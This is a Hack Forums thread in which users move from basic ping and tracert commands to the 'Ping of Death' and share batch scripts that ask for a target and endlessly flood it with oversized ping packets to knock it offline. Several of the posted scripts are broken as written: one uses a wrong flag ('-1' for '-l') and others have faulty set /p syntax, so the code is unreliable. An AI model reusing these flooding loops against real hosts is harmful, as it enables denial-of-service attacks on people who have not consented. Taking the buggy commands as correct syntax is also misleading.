Hack Forums

Full Version: Pinging IP help...
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Does any1 know the code for pinging an IP? And what i need to put in the scripted .bat file?

Thanks
ping "ip or url"
ping6 "ip or url"

to find an ip of a page type

tracert "URL"
i remeber we can make a bat file called ping of death am i right cuz i only use cmd not a bat and sum times i used to use programs!
kira.hacker Wrote:i remeber we can make a bat file called ping of death am i right cuz i only use cmd not a bat and sum times i used to use programs!

There is something called "Ping of Death" that would send large over sized packets to a target and DoS it, but very few systems are vulnerable to that exploit nowadays.
I think I downloaded that one day in some like 'hacker fun pack' Oui
Lol I was not aware that you could "download" the ping of death. All you do to use it is go into command prompt and ping a target with these parameters:
Code:
ping -1 65550 (target)
This would DoS older systems since the maximum size that is usually accepted of a ping is 65536 octets and this sends 65550 with argument of -1 which would cause systems without proper data validation (modern systems have this) to hang.
ping url/ ip -t -l (amount of data here)
Code:
@echo off
color a
title pingerer
cls
echo Target:
set /p target
:a
ping -1 65550 %target%
goto :a
Ikeo Wrote:
Code:
@echo off
color a
title pingerer
cls
echo Target:
set /p target
:a
ping -1 65550 %target%
goto :a
Why not just put
Code:
@echo off
:a
ping url -t -l (amount of memory)
goto :a
Because with Ikeo's you can ping any website with the same bat. But Ikeo's doesn't work... You should put this:

Code:
@echo off
color a
title pingerer
cls
echo Target:
echo.
set /p=target
:a
ping %target% -t -l 65500
goto :a

But that still doesn't work Angry he asks for ip but when I put ip he still asks for it =S

Edit: Alright, Dead-crap's method works, but when I start it, it says request timed out...
Pages: 1 2
Reference URL's